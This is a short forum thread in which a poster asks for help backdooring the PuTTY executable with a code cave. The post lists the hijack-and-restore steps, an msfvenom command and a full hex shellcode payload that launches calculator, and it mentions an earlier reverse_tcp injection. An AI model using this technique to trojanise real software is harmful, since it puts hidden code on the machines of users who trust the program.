Backdoorin pe files

Hi, Folks

Is there anyone injected msfvenom cmd=calc.exe payload into putty? I injected msfvenom reverse_tcp payload into putty without a problem.

what the problem here is after calc.exe called it is not running putty function.

What i did:

-Added new section
-Hijacked execution flow to new section
-pushad | pushfd - store all flags and register value
-pasted payload into new section
-stack align
-popfd | popad
-restore hijacked intrusction

I also uploaded the file :

Payload to inject: 2bc983e9cfe8ffffffffc05e81760ea3ea1e4983eefce2f45f029c49a3ea7ec046dbde2d28ba2ec2f1e6951bb7616c61ac5d546f9215b275c2961c65832bd144a22dfcbbf1bd951bb361547528a60f3140a21f98f2614769a2399500bb09240028de954875dbe1e56225134864d2fe3c55e963b198973a3c47b2951187ebcd2f28e655c2fbf61f9a28ee954873635a6d87b14528fab04fb643b5411328f8f5c4fe801fc426581e49a3ba7678288599b67651b48c41b776ef365783b676d61835a96ae5a9d6efa50eb0987123a3b9e19cc08b722a8d8f662ca3ea1e49

Command used:msfvenom -a x86 —platform windows -p windows/exec cmd=calc.exe -b ”\00\z0a\x0d\0xx” EXITFUNC=none -f hex

How are you restoring normal execution?

This topic was automatically closed 3 days after the last reply. New replies are no longer allowed.